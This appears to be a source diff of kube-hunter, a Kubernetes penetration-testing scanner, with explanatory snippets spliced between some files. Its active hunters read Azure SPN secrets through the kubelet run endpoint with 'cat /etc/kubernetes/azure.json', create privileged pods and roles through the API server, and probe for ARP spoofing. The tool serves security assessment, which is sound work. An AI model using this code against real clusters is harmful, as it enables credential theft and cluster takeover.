version = version_info[start + len("GitVersion':\"") : version_info.find('",', start)]
except Exception:
logger.debug("Could not find kubectl client")
return version
def execute(self):
logger.debug("Attempting to discover a local kubectl client")
version = self.get_kubectl_binary_version()
if version:
self.publish_event(KubectlClientEvent(version=version))

kube_hunter/modules/discovery/kubelet.py

@@ -1,65 +1,77 @@
import json
import logging
from enum import Enum
from ...core.types import Hunter, Kubelet
import requests
import urllib3
from enum import Enum
from kube_hunter.conf import get_config
from kube_hunter.core.types import Discovery
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import OpenPortEvent, Event, Service
from ...core.events import handler
from ...core.events.types import OpenPortEvent, Vulnerability, Event, Service
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
logger = logging.getLogger(__name__)
""" Services """
class ReadOnlyKubeletEvent(Service, Event):
"""The read-only port on the kubelet serves health probing endpoints, and is relied upon by many kubernetes componenets"""
"""The read-only port on the kubelet serves health probing endpoints,
and is relied upon by many kubernetes components"""
def __init__(self):
Service.__init__(self, name="Kubelet API (readonly)")
class SecureKubeletEvent(Service, Event):
"""The Kubelet is the main component in every Node, all pod operations goes through the kubelet"""
def __init__(self, cert=False, token=False, anonymous_auth=True, **kwargs):
self.cert = cert
self.token = token
self.anonymous_auth = anonymous_auth
Service.__init__(self, name="Kubelet API", **kwargs)
Service.__init__(self, name="Kubelet API", **kwargs)
class KubeletPorts(Enum):
SECURED = 10250
READ_ONLY = 10255
@handler.subscribe(OpenPortEvent, predicate= lambda x: x.port == 10255 or x.port == 10250)
class KubeletDiscovery(Hunter):
@handler.subscribe(OpenPortEvent, predicate=lambda x: x.port in [10250, 10255])
class KubeletDiscovery(Discovery):
"""Kubelet Discovery
Checks for the existence of a Kubelet service, and its open ports
"""
def __init__(self, event):
self.event = event
def get_read_only_access(self):
logging.debug(self.event.host)
logging.debug("Passive hunter is attempting to get kubelet read access")
r = requests.get("http://{host}:{port}/pods".format(host=self.event.host, port=self.event.port))
config = get_config()
endpoint = f"http://{self.event.host}:{self.event.port}/pods"
logger.debug(f"Trying to get kubelet read access at {endpoint}")
r = requests.get(endpoint, timeout=config.network_timeout)
if r.status_code == 200:
self.publish_event(ReadOnlyKubeletEvent())
def get_secure_access(self):
logging.debug("Attempting to get kubelet secure access")
logger.debug("Attempting to get kubelet secure access")
ping_status = self.ping_kubelet()
if ping_status == 200:
self.publish_event(SecureKubeletEvent(secure=False))
elif ping_status == 403:
elif ping_status == 403:
self.publish_event(SecureKubeletEvent(secure=True))
elif ping_status == 401:
self.publish_event(SecureKubeletEvent(secure=True, anonymous_auth=False))
def ping_kubelet(self):
logging.debug("Attempting to get pod info from kubelet")
config = get_config()
endpoint = f"https://{self.event.host}:{self.event.port}/pods"
logger.debug("Attempting to get pods info from kubelet")
try:
return requests.get("https://{host}:{port}/pods".format(host=self.event.host, port=self.event.port), verify=False).status_code
except Exception as ex:
logging.debug("Failed pinging https port 10250 on {} : {}".format(self.event.host, ex.message))
return requests.get(endpoint, verify=False, timeout=config.network_timeout).status_code
except Exception:
logger.debug(f"Failed pinging https port on {endpoint}", exc_info=True)
def execute(self):
if self.event.port == KubeletPorts.SECURED.value:

kube_hunter/modules/discovery/ports.py

@@ -1,39 +1,43 @@
import logging
from socket import socket
from ...core.types import Hunter
from ...core.events import handler
from ...core.events.types import NewHostEvent, OpenPortEvent
from kube_hunter.core.types import Discovery
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import NewHostEvent, OpenPortEvent
logger = logging.getLogger(__name__)
default_ports = [8001, 8080, 10250, 10255, 30000, 443, 6443, 2379]
default_ports = [8001, 10250, 10255, 30000, 443, 6443, 2379]
@handler.subscribe(NewHostEvent)
class PortDiscovery(Hunter):
class PortDiscovery(Discovery):
"""Port Scanning
Scans Kubernetes known ports to determine open endpoints for discovery
"""
def __init__(self, event):
self.event = event
self.host = event.host
self.port = event.port
def execute(self):
logging.debug("host {0} try ports: {1}".format(self.host, default_ports))
logger.debug(f"host {self.host} try ports: {default_ports}")
for single_port in default_ports:
if self.test_connection(self.host, single_port):
logging.debug("Reachable port found: {0}".format(single_port))
logger.debug(f"Reachable port found: {single_port}")
self.publish_event(OpenPortEvent(port=single_port))
@staticmethod
def test_connection(host, port):
s = socket()
s.settimeout(1.5)
try:
try:
logger.debug(f"Scanning {host}:{port}")
success = s.connect_ex((str(host), port))
if success == 0:
return True
except: pass
finally: s.close()
except Exception:
logger.debug(f"Failed to probe {host}:{port}")
finally:
s.close()
return False

kube_hunter/modules/discovery/proxy.py Normal file

@@ -0,0 +1,45 @@
import logging
import requests
from kube_hunter.conf import get_config
from kube_hunter.core.types import Discovery
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Service, Event, OpenPortEvent
logger = logging.getLogger(__name__)
class KubeProxyEvent(Event, Service):
"""proxies from a localhost address to the Kubernetes apiserver"""
def __init__(self):
Service.__init__(self, name="Kubernetes Proxy")
@handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 8001)
class KubeProxy(Discovery):
"""Proxy Discovery
Checks for the existence of an open Proxy service
"""
def __init__(self, event):
self.event = event
self.host = event.host
self.port = event.port or 8001
@property
def accessible(self):
config = get_config()
endpoint = f"http://{self.host}:{self.port}/api/v1"
logger.debug("Attempting to discover a proxy service")
try:
r = requests.get(endpoint, timeout=config.network_timeout)
if r.status_code == 200 and "APIResourceList" in r.text:
return True
except requests.Timeout:
logger.debug(f"failed to get {endpoint}", exc_info=True)
return False
def execute(self):
if self.accessible:
self.publish_event(KubeProxyEvent())

kube_hunter/modules/hunting/__init__.py Normal file

@@ -0,0 +1,16 @@
# flake8: noqa: E402
from . import (
aks,
apiserver,
arp,
capabilities,
certificates,
cves,
dashboard,
dns,
etcd,
kubelet,
mounts,
proxy,
secrets,
)

kube_hunter/modules/hunting/aks.py Normal file

@@ -0,0 +1,99 @@
import json
import logging
import requests
from kube_hunter.conf import get_config
from kube_hunter.modules.hunting.kubelet import ExposedRunHandler
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Event, Vulnerability
from kube_hunter.core.types import Hunter, ActiveHunter, IdentityTheft, Azure
logger = logging.getLogger(__name__)
class AzureSpnExposure(Vulnerability, Event):
"""The SPN is exposed, potentially allowing an attacker to gain access to the Azure subscription"""
def __init__(self, container):
Vulnerability.__init__(
self,
Azure,
"Azure SPN Exposure",
category=IdentityTheft,
vid="KHV004",
)
self.container = container
@handler.subscribe(ExposedRunHandler, predicate=lambda x: x.cloud == "Azure")
class AzureSpnHunter(Hunter):
"""AKS Hunting
Hunting Azure cluster deployments using specific known configurations
"""
def __init__(self, event):
self.event = event
self.base_url = f"https://{self.event.host}:{self.event.port}"
# getting a container that has access to the azure.json file
def get_key_container(self):
config = get_config()
endpoint = f"{self.base_url}/pods"
logger.debug("Trying to find container with access to azure.json file")
try:
r = requests.get(endpoint, verify=False, timeout=config.network_timeout)
except requests.Timeout:
logger.debug("failed getting pod info")
else:
pods_data = r.json().get("items", [])
suspicious_volume_names = []
for pod_data in pods_data:
for volume in pod_data["spec"].get("volumes", []):
if volume.get("hostPath"):
path = volume["hostPath"]["path"]
if "/etc/kubernetes/azure.json".startswith(path):
suspicious_volume_names.append(volume["name"])
for container in pod_data["spec"]["containers"]:
for mount in container.get("volumeMounts", []):
if mount["name"] in suspicious_volume_names:
return {
"name": container["name"],
"pod": pod_data["metadata"]["name"],
"namespace": pod_data["metadata"]["namespace"],
}
def execute(self):
container = self.get_key_container()
if container:
self.publish_event(AzureSpnExposure(container=container))
@handler.subscribe(AzureSpnExposure)
class ProveAzureSpnExposure(ActiveHunter):
"""Azure SPN Hunter
Gets the azure subscription file on the host by executing inside a container
"""
def __init__(self, event):
self.event = event
self.base_url = f"https://{self.event.host}:{self.event.port}"
def run(self, command, container):
config = get_config()
run_url = "/".join(self.base_url, "run", container["namespace"], container["pod"], container["name"])
return requests.post(run_url, verify=False, params={"cmd": command}, timeout=config.network_timeout)
def execute(self):
try:
subscription = self.run("cat /etc/kubernetes/azure.json", container=self.event.container).json()
except requests.Timeout:
logger.debug("failed to run command in container", exc_info=True)
except json.decoder.JSONDecodeError:
logger.warning("failed to parse SPN")
else:
if "subscriptionId" in subscription:
self.event.subscriptionId = subscription["subscriptionId"]
self.event.aadClientId = subscription["aadClientId"]
self.event.aadClientSecret = subscription["aadClientSecret"]
self.event.tenantId = subscription["tenantId"]
self.event.evidence = f"subscription: {self.event.subscriptionId}"
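The subtle part of get_key_container is the inverted prefix test: any hostPath that mounts a parent directory of /etc/kubernetes/azure.json (including / itself) carries the SPN file into the pod. A toy illustration, using a hypothetical pod spec:

AZURE_JSON = "/etc/kubernetes/azure.json"

pod_spec = {
    "volumes": [{"name": "host-etc", "hostPath": {"path": "/etc/kubernetes"}}],
    "containers": [{"name": "app", "volumeMounts": [{"name": "host-etc", "mountPath": "/host-etc"}]}],
}

for volume in pod_spec["volumes"]:
    if volume.get("hostPath"):
        path = volume["hostPath"]["path"]
        # True here: "/etc/kubernetes" is a prefix of the azure.json path,
        # so the mount carries the SPN credentials file into the pod
        print(volume["name"], AZURE_JSON.startswith(path))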


@@ -0,0 +1,643 @@
import logging
import json
import uuid
import requests
from kube_hunter.conf import get_config
from kube_hunter.modules.discovery.apiserver import ApiServer
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Vulnerability, Event, K8sVersionDisclosure
from kube_hunter.core.types import Hunter, ActiveHunter, KubernetesCluster
from kube_hunter.core.types import (
AccessRisk,
InformationDisclosure,
UnauthenticatedAccess,
)
logger = logging.getLogger(__name__)
class ServerApiAccess(Vulnerability, Event):
"""The API Server port is accessible.
Depending on your RBAC settings this could expose access to or control of your cluster."""
def __init__(self, evidence, using_token):
if using_token:
name = "Access to API using service account token"
category = InformationDisclosure
else:
name = "Unauthenticated access to API"
category = UnauthenticatedAccess
Vulnerability.__init__(
self,
KubernetesCluster,
name=name,
category=category,
vid="KHV005",
)
self.evidence = evidence
class ServerApiHTTPAccess(Vulnerability, Event):
"""The API Server port is accessible over HTTP, and therefore unencrypted.
Depending on your RBAC settings this could expose access to or control of your cluster."""
def __init__(self, evidence):
name = "Insecure (HTTP) access to API"
category = UnauthenticatedAccess
Vulnerability.__init__(
self,
KubernetesCluster,
name=name,
category=category,
vid="KHV006",
)
self.evidence = evidence
class ApiInfoDisclosure(Vulnerability, Event):
"""Information Disclosure depending upon RBAC permissions and Kube-Cluster Setup"""
def __init__(self, evidence, using_token, name):
category = InformationDisclosure
if using_token:
name += " using default service account token"
else:
name += " as anonymous user"
Vulnerability.__init__(
self,
KubernetesCluster,
name=name,
category=category,
vid="KHV007",
)
self.evidence = evidence
class ListPodsAndNamespaces(ApiInfoDisclosure):
""" Accessing pods might give an attacker valuable information"""
def __init__(self, evidence, using_token):
ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing pods")
class ListNamespaces(ApiInfoDisclosure):
""" Accessing namespaces might give an attacker valuable information """
def __init__(self, evidence, using_token):
ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing namespaces")
class ListRoles(ApiInfoDisclosure):
""" Accessing roles might give an attacker valuable information """
def __init__(self, evidence, using_token):
ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing roles")
class ListClusterRoles(ApiInfoDisclosure):
""" Accessing cluster roles might give an attacker valuable information """
def __init__(self, evidence, using_token):
ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing cluster roles")
class CreateANamespace(Vulnerability, Event):
"""Creating a namespace might give an attacker an area with default (exploitable) permissions to run pods in."""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Created a namespace",
category=AccessRisk,
)
self.evidence = evidence
class DeleteANamespace(Vulnerability, Event):
""" Deleting a namespace might give an attacker the option to affect application behavior """
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Delete a namespace",
category=AccessRisk,
)
self.evidence = evidence
class CreateARole(Vulnerability, Event):
"""Creating a role might give an attacker the option to harm the normal behavior of newly created pods
within the specified namespaces.
"""
def __init__(self, evidence):
Vulnerability.__init__(self, KubernetesCluster, name="Created a role", category=AccessRisk)
self.evidence = evidence
class CreateAClusterRole(Vulnerability, Event):
"""Creating a cluster role might give an attacker the option to harm the normal behavior of newly created pods
across the whole cluster
"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Created a cluster role",
category=AccessRisk,
)
self.evidence = evidence
class PatchARole(Vulnerability, Event):
"""Patching a role might give an attacker the option to create new pods with custom roles within the
specific role's namespace scope
"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Patched a role",
category=AccessRisk,
)
self.evidence = evidence
class PatchAClusterRole(Vulnerability, Event):
"""Patching a cluster role might give an attacker the option to create new pods with custom roles within the whole
cluster scope.
"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Patched a cluster role",
category=AccessRisk,
)
self.evidence = evidence
class DeleteARole(Vulnerability, Event):
""" Deleting a role might allow an attacker to affect access to resources in the namespace"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Deleted a role",
category=AccessRisk,
)
self.evidence = evidence
class DeleteAClusterRole(Vulnerability, Event):
""" Deleting a cluster role might allow an attacker to affect access to resources in the cluster"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Deleted a cluster role",
category=AccessRisk,
)
self.evidence = evidence
class CreateAPod(Vulnerability, Event):
""" Creating a new pod allows an attacker to run custom code"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Created A Pod",
category=AccessRisk,
)
self.evidence = evidence
class CreateAPrivilegedPod(Vulnerability, Event):
""" Creating a new PRIVILEGED pod would gain an attacker FULL CONTROL over the cluster"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Created A PRIVILEGED Pod",
category=AccessRisk,
)
self.evidence = evidence
class PatchAPod(Vulnerability, Event):
""" Patching a pod allows an attacker to compromise and control it """
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Patched A Pod",
category=AccessRisk,
)
self.evidence = evidence
class DeleteAPod(Vulnerability, Event):
""" Deleting a pod allows an attacker to disturb applications on the cluster """
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Deleted A Pod",
category=AccessRisk,
)
self.evidence = evidence
class ApiServerPassiveHunterFinished(Event):
def __init__(self, namespaces):
self.namespaces = namespaces
# This Hunter checks what happens if we try to access the API Server without a service account token
# If we have a service account token we'll also trigger AccessApiServerWithToken below
@handler.subscribe(ApiServer)
class AccessApiServer(Hunter):
"""API Server Hunter
Checks if API server is accessible
"""
def __init__(self, event):
self.event = event
self.path = f"{self.event.protocol}://{self.event.host}:{self.event.port}"
self.headers = {}
self.with_token = False
def access_api_server(self):
config = get_config()
logger.debug(f"Passive Hunter is attempting to access the API at {self.path}")
try:
r = requests.get(f"{self.path}/api", headers=self.headers, verify=False, timeout=config.network_timeout)
if r.status_code == 200 and r.content:
return r.content
except requests.exceptions.ConnectionError:
pass
return False
def get_items(self, path):
config = get_config()
try:
items = []
r = requests.get(path, headers=self.headers, verify=False, timeout=config.network_timeout)
if r.status_code == 200:
resp = json.loads(r.content)
for item in resp["items"]:
items.append(item["metadata"]["name"])
return items
logger.debug(f"Got HTTP {r.status_code} respone: {r.text}")
except (requests.exceptions.ConnectionError, KeyError):
logger.debug(f"Failed retrieving items from API server at {path}")
return None
def get_pods(self, namespace=None):
config = get_config()
pods = []
try:
if not namespace:
r = requests.get(
f"{self.path}/api/v1/pods",
headers=self.headers,
verify=False,
timeout=config.network_timeout,
)
else:
r = requests.get(
f"{self.path}/api/v1/namespaces/{namespace}/pods",
headers=self.headers,
verify=False,
timeout=config.network_timeout,
)
if r.status_code == 200:
resp = json.loads(r.content)
for item in resp["items"]:
name = item["metadata"]["name"].encode("ascii", "ignore")
namespace = item["metadata"]["namespace"].encode("ascii", "ignore")
pods.append({"name": name, "namespace": namespace})
return pods
except (requests.exceptions.ConnectionError, KeyError):
pass
return None
def execute(self):
api = self.access_api_server()
if api:
if self.event.protocol == "http":
self.publish_event(ServerApiHTTPAccess(api))
else:
self.publish_event(ServerApiAccess(api, self.with_token))
namespaces = self.get_items(f"{self.path}/api/v1/namespaces")
if namespaces:
self.publish_event(ListNamespaces(namespaces, self.with_token))
roles = self.get_items(f"{self.path}/apis/rbac.authorization.k8s.io/v1/roles")
if roles:
self.publish_event(ListRoles(roles, self.with_token))
cluster_roles = self.get_items(f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles")
if cluster_roles:
self.publish_event(ListClusterRoles(cluster_roles, self.with_token))
pods = self.get_pods()
if pods:
self.publish_event(ListPodsAndNamespaces(pods, self.with_token))
# If we have a service account token, this event should get triggered twice - once with and once without
# the token
self.publish_event(ApiServerPassiveHunterFinished(namespaces))
@handler.subscribe(ApiServer, predicate=lambda x: x.auth_token)
class AccessApiServerWithToken(AccessApiServer):
"""API Server Hunter
Accessing the API server using the service account token obtained from a compromised pod
"""
def __init__(self, event):
super().__init__(event)
assert self.event.auth_token
self.headers = {"Authorization": f"Bearer {self.event.auth_token}"}
self.category = InformationDisclosure
self.with_token = True
# Active Hunter
@handler.subscribe(ApiServerPassiveHunterFinished)
class AccessApiServerActive(ActiveHunter):
"""API server hunter
Accessing the api server might grant an attacker full control over the cluster
"""
def __init__(self, event):
self.event = event
self.path = f"{self.event.protocol}://{self.event.host}:{self.event.port}"
def create_item(self, path, data):
config = get_config()
headers = {"Content-Type": "application/json"}
if self.event.auth_token:
headers["Authorization"] = f"Bearer {self.event.auth_token}"
try:
res = requests.post(path, verify=False, data=data, headers=headers, timeout=config.network_timeout)
if res.status_code in [200, 201, 202]:
parsed_content = json.loads(res.content)
return parsed_content["metadata"]["name"]
except (requests.exceptions.ConnectionError, KeyError):
pass
return None
def patch_item(self, path, data):
config = get_config()
headers = {"Content-Type": "application/json-patch+json"}
if self.event.auth_token:
headers["Authorization"] = f"Bearer {self.event.auth_token}"
try:
res = requests.patch(path, headers=headers, verify=False, data=data, timeout=config.network_timeout)
if res.status_code not in [200, 201, 202]:
return None
parsed_content = json.loads(res.content)
# TODO is there a patch timestamp we could use?
return parsed_content["metadata"]["namespace"]
except (requests.exceptions.ConnectionError, KeyError):
pass
return None
def delete_item(self, path):
config = get_config()
headers = {}
if self.event.auth_token:
headers["Authorization"] = f"Bearer {self.event.auth_token}"
try:
res = requests.delete(path, headers=headers, verify=False, timeout=config.network_timeout)
if res.status_code in [200, 201, 202]:
parsed_content = json.loads(res.content)
return parsed_content["metadata"]["deletionTimestamp"]
except (requests.exceptions.ConnectionError, KeyError):
pass
return None
def create_a_pod(self, namespace, is_privileged):
privileged_value = {"securityContext": {"privileged": True}} if is_privileged else {}
random_name = str(uuid.uuid4())[0:5]
pod = {
"apiVersion": "v1",
"kind": "Pod",
"metadata": {"name": random_name},
"spec": {
"containers": [
{"name": random_name, "image": "nginx:1.7.9", "ports": [{"containerPort": 80}], **privileged_value}
]
},
}
return self.create_item(path=f"{self.path}/api/v1/namespaces/{namespace}/pods", data=json.dumps(pod))
def delete_a_pod(self, namespace, pod_name):
delete_timestamp = self.delete_item(f"{self.path}/api/v1/namespaces/{namespace}/pods/{pod_name}")
if not delete_timestamp:
logger.error(f"Created pod {pod_name} in namespace {namespace} but unable to delete it")
return delete_timestamp
def patch_a_pod(self, namespace, pod_name):
data = [{"op": "add", "path": "/hello", "value": ["world"]}]
return self.patch_item(
path=f"{self.path}/api/v1/namespaces/{namespace}/pods/{pod_name}",
data=json.dumps(data),
)
def create_namespace(self):
random_name = (str(uuid.uuid4()))[0:5]
data = {
"kind": "Namespace",
"apiVersion": "v1",
"metadata": {"name": random_name, "labels": {"name": random_name}},
}
return self.create_item(path=f"{self.path}/api/v1/namespaces", data=json.dumps(data))
def delete_namespace(self, namespace):
delete_timestamp = self.delete_item(f"{self.path}/api/v1/namespaces/{namespace}")
if delete_timestamp is None:
logger.error(f"Created namespace {namespace} but failed to delete it")
return delete_timestamp
def create_a_role(self, namespace):
name = str(uuid.uuid4())[0:5]
role = {
"kind": "Role",
"apiVersion": "rbac.authorization.k8s.io/v1",
"metadata": {"namespace": namespace, "name": name},
"rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "watch", "list"]}],
}
return self.create_item(
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/namespaces/{namespace}/roles",
data=json.dumps(role),
)
def create_a_cluster_role(self):
name = str(uuid.uuid4())[0:5]
cluster_role = {
"kind": "ClusterRole",
"apiVersion": "rbac.authorization.k8s.io/v1",
"metadata": {"name": name},
"rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "watch", "list"]}],
}
return self.create_item(
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles",
data=json.dumps(cluster_role),
)
def delete_a_role(self, namespace, name):
delete_timestamp = self.delete_item(
f"{self.path}/apis/rbac.authorization.k8s.io/v1/namespaces/{namespace}/roles/{name}"
)
if delete_timestamp is None:
logger.error(f"Created role {name} in namespace {namespace} but unable to delete it")
return delete_timestamp
def delete_a_cluster_role(self, name):
delete_timestamp = self.delete_item(f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles/{name}")
if delete_timestamp is None:
logger.error(f"Created cluster role {name} but unable to delete it")
return delete_timestamp
def patch_a_role(self, namespace, role):
data = [{"op": "add", "path": "/hello", "value": ["world"]}]
return self.patch_item(
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/namespaces/{namespace}/roles/{role}",
data=json.dumps(data),
)
def patch_a_cluster_role(self, cluster_role):
data = [{"op": "add", "path": "/hello", "value": ["world"]}]
return self.patch_item(
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles/{cluster_role}",
data=json.dumps(data),
)
def execute(self):
# Try creating cluster-wide objects
namespace = self.create_namespace()
if namespace:
self.publish_event(CreateANamespace(f"new namespace name: {namespace}"))
delete_timestamp = self.delete_namespace(namespace)
if delete_timestamp:
self.publish_event(DeleteANamespace(delete_timestamp))
cluster_role = self.create_a_cluster_role()
if cluster_role:
self.publish_event(CreateAClusterRole(f"Cluster role name: {cluster_role}"))
patch_evidence = self.patch_a_cluster_role(cluster_role)
if patch_evidence:
self.publish_event(
PatchAClusterRole(f"Patched Cluster Role Name: {cluster_role} Patch evidence: {patch_evidence}")
)
delete_timestamp = self.delete_a_cluster_role(cluster_role)
if delete_timestamp:
self.publish_event(DeleteAClusterRole(f"Cluster role {cluster_role} deletion time {delete_timestamp}"))
# Try attacking all the namespaces we know about
if self.event.namespaces:
for namespace in self.event.namespaces:
# Try creating and deleting a privileged pod
pod_name = self.create_a_pod(namespace, True)
if pod_name:
self.publish_event(CreateAPrivilegedPod(f"Pod Name: {pod_name} Namespace: {namespace}"))
delete_time = self.delete_a_pod(namespace, pod_name)
if delete_time:
self.publish_event(DeleteAPod(f"Pod Name: {pod_name} Deletion time: {delete_time}"))
# Try creating, patching and deleting an unprivileged pod
pod_name = self.create_a_pod(namespace, False)
if pod_name:
self.publish_event(CreateAPod(f"Pod Name: {pod_name} Namespace: {namespace}"))
patch_evidence = self.patch_a_pod(namespace, pod_name)
if patch_evidence:
self.publish_event(
PatchAPod(
f"Pod Name: {pod_name} " f"Namespace: {namespace} " f"Patch evidence: {patch_evidence}"
)
)
delete_time = self.delete_a_pod(namespace, pod_name)
if delete_time:
self.publish_event(
DeleteAPod(
f"Pod Name: {pod_name} " f"Namespace: {namespace} " f"Delete time: {delete_time}"
)
)
role = self.create_a_role(namespace)
if role:
self.publish_event(CreateARole(f"Role name: {role}"))
patch_evidence = self.patch_a_role(namespace, role)
if patch_evidence:
self.publish_event(
PatchARole(
f"Patched Role Name: {role} "
f"Namespace: {namespace} "
f"Patch evidence: {patch_evidence}"
)
)
delete_time = self.delete_a_role(namespace, role)
if delete_time:
self.publish_event(
DeleteARole(
f"Deleted role: {role} " f"Namespace: {namespace} " f"Delete time: {delete_time}"
)
)
# Note: we are not binding any role or cluster role because
# in certain cases it might affect the running pod within the cluster (and we don't want to do that).
@handler.subscribe(ApiServer)
class ApiVersionHunter(Hunter):
"""Api Version Hunter
Tries to obtain the API Server's version directly from the /version endpoint
"""
def __init__(self, event):
self.event = event
self.path = f"{self.event.protocol}://{self.event.host}:{self.event.port}"
self.session = requests.Session()
self.session.verify = False
if self.event.auth_token:
self.session.headers.update({"Authorization": f"Bearer {self.event.auth_token}"})
def execute(self):
config = get_config()
if self.event.auth_token:
logger.debug(
"Trying to access the API server version endpoint using pod's"
f" service account token on {self.event.host}:{self.event.port} \t"
)
else:
logger.debug("Trying to access the API server version endpoint anonymously")
version = self.session.get(f"{self.path}/version", timeout=config.network_timeout).json()["gitVersion"]
logger.debug(f"Discovered version of api server {version}")
self.publish_event(K8sVersionDisclosure(version=version, from_endpoint="/version"))
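The passive hunter's first step is a plain GET of /api, anonymously or with a bearer token; a minimal sketch, where the endpoint and token are placeholder assumptions (inside a pod, the token would be read from /var/run/secrets/kubernetes.io/serviceaccount/token):

import requests

base = "https://10.0.0.1:6443"  # hypothetical API server
token = None  # or a service account token string

headers = {"Authorization": f"Bearer {token}"} if token else {}
try:
    r = requests.get(f"{base}/api", headers=headers, verify=False, timeout=5)
    print(r.status_code, r.text[:200])
except requests.exceptions.ConnectionError:
    print("API server not reachable")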


@@ -0,0 +1,71 @@
import logging
from scapy.all import ARP, IP, ICMP, Ether, sr1, srp
from kube_hunter.conf import get_config
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Event, Vulnerability
from kube_hunter.core.types import ActiveHunter, KubernetesCluster, IdentityTheft
from kube_hunter.modules.hunting.capabilities import CapNetRawEnabled
logger = logging.getLogger(__name__)
class PossibleArpSpoofing(Vulnerability, Event):
"""A malicious pod running on the cluster could potentially run an ARP Spoof attack
and perform a MITM between pods on the node."""
def __init__(self):
Vulnerability.__init__(
self,
KubernetesCluster,
"Possible Arp Spoof",
category=IdentityTheft,
vid="KHV020",
)
@handler.subscribe(CapNetRawEnabled)
class ArpSpoofHunter(ActiveHunter):
"""Arp Spoof Hunter
Checks for the possibility of running an ARP spoof
attack from within a pod (results are based on the running node)
"""
def __init__(self, event):
self.event = event
def try_getting_mac(self, ip):
config = get_config()
ans = sr1(ARP(op=1, pdst=ip), timeout=config.network_timeout, verbose=0)
return ans[ARP].hwsrc if ans else None
def detect_l3_on_host(self, arp_responses):
""" returns True for an existence of an L3 network plugin """
logger.debug("Attempting to detect L3 network plugin using ARP")
unique_macs = list({response[ARP].hwsrc for _, response in arp_responses})
# if LAN addresses not unique
if len(unique_macs) == 1:
# if an ip outside the subnets gets a mac address
outside_mac = self.try_getting_mac("1.1.1.1")
# outside mac is the same as lan macs
if outside_mac == unique_macs[0]:
return True
# only one mac address for whole LAN and outside
return False
def execute(self):
config = get_config()
self_ip = sr1(IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout)[IP].dst
arp_responses, _ = srp(
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=f"{self_ip}/24"),
timeout=config.network_timeout,
verbose=0,
)
# arp enabled on cluster and more than one pod on node
if len(arp_responses) > 1:
# L3 plugin not installed
if not self.detect_l3_on_host(arp_responses):
self.publish_event(PossibleArpSpoofing())
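The L3-plugin heuristic above reduces to: if every ARP reply on the subnet resolves to one MAC that also answers for an address outside the subnet, a router (or L3 network plugin) is answering for everyone, and spoofing peers directly is pointless. The decision logic can be sketched without sending any packets; the MAC strings below are made up:

def looks_like_l3_plugin(lan_macs, outside_mac):
    # a single MAC for the whole LAN that also answers for an outside IP
    unique_macs = set(lan_macs)
    return len(unique_macs) == 1 and outside_mac in unique_macs

print(looks_like_l3_plugin(["0a:58:0a:f4:00:01"] * 4, "0a:58:0a:f4:00:01"))  # True
print(looks_like_l3_plugin(["0a:58:0a:f4:00:01", "0a:58:0a:f4:00:02"], None))  # False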


@@ -0,0 +1,49 @@
import socket
import logging
from kube_hunter.modules.discovery.hosts import RunningAsPodEvent
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Event, Vulnerability
from kube_hunter.core.types import Hunter, AccessRisk, KubernetesCluster
logger = logging.getLogger(__name__)
class CapNetRawEnabled(Event, Vulnerability):
"""CAP_NET_RAW is enabled by default for pods.
If an attacker manages to compromise a pod,
they could potentially take advantage of this capability to perform network
attacks on other pods running on the same node"""
def __init__(self):
Vulnerability.__init__(
self,
KubernetesCluster,
name="CAP_NET_RAW Enabled",
category=AccessRisk,
)
@handler.subscribe(RunningAsPodEvent)
class PodCapabilitiesHunter(Hunter):
"""Pod Capabilities Hunter
Checks for default enabled capabilities in a pod
"""
def __init__(self, event):
self.event = event
def check_net_raw(self):
logger.debug("Passive hunter's trying to open a RAW socket")
try:
# trying to open a raw socket without CAP_NET_RAW will raise PermissionsError
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.close()
logger.debug("Passive hunter's closing RAW socket")
return True
except PermissionError:
logger.debug("CAP_NET_RAW not enabled")
def execute(self):
if self.check_net_raw():
self.publish_event(CapNetRawEnabled())
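The capability check itself is self-contained and can be tried directly on a Linux host or inside a pod; a minimal sketch of the same raw-socket test:

import socket

def has_cap_net_raw():
    # opening a raw socket requires CAP_NET_RAW; PermissionError means it was dropped
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
        s.close()
        return True
    except PermissionError:
        return False

print(has_cap_net_raw())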


@@ -0,0 +1,55 @@
import ssl
import logging
import base64
import re
from kube_hunter.core.types import Hunter, KubernetesCluster, InformationDisclosure
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Vulnerability, Event, Service
